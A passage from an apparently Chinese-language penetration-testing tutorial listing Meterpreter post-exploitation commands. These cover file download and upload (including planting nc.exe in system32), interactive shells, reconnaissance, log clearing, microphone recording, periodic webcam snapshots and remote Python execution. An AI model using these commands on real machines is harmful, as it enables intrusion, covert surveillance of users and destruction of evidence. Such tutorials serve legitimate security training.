这时候再去查看已经没有日志了,只有一条日志成功清除的记录
download:下载目标系统的文件到 “lpwd” 目录下
upload:上传文件,upload /usr/share/windows-binaries/nc.exe C:\\WINDOWS\\system32,“\”有转义符的意思,我们这里需要两条“\”
execute:执行命令,-f 后面跟需要执行的命令
和cmd交互:execute -f cmd.exe -i,直接输入shell也能获得操作系统的shell
ps:查看目标正在运行的进程
netstat:查看目标的网络连接状况、端口开放情况
sysinfo:目标操作系统信息
kill:杀死进程
reboot:重启机器
shutdown:关闭机器
shell:获得操作系统的shell
show_mount:挂载了几个分区
search:搜索目标系统的上的文件
search -f win.ini
arp:查看目标机器的arp缓存
ipconfig / ifconfig:查看目标IP信息
route:查看路由表
可以添加、删除路由,可以通过route -h查看操作
idletime:目标操作系统已经空闲了多长时间,即多长时间没进行操作。时间久可以猜测用户不在计算机前。
resource:调用一个外部的资源文件
比如在Kali的“lpwd”目录创建一个 test.txt,里面填入“pwd”等命令,一条命令一行
resource test.txt
record_mic:用目标的麦克风记录声音
webcam_list:列出目标机器上的摄像头
webcam_snap:用摄像头拍照
webcam_snap -i 1 -v false:每隔1秒拍一次照
三、Meterpreter Python扩展目标机器无需安装Python运行环境,就能运行原生Python代码。
这个扩展以插件的形式存在,我们需要先加载这个加载:
load python
python_execute "print (\'hello\')",直接执行python代码
python_execute "import os; cd = os.getcwd()" -r cd,将os.getcwd()赋值给 cd 这个变量,然后用 -r cd 读取 cd 这个变量的值
python_import -f test.py,导入一个写好的python脚本
# test.pyimport os print(os.getcwd())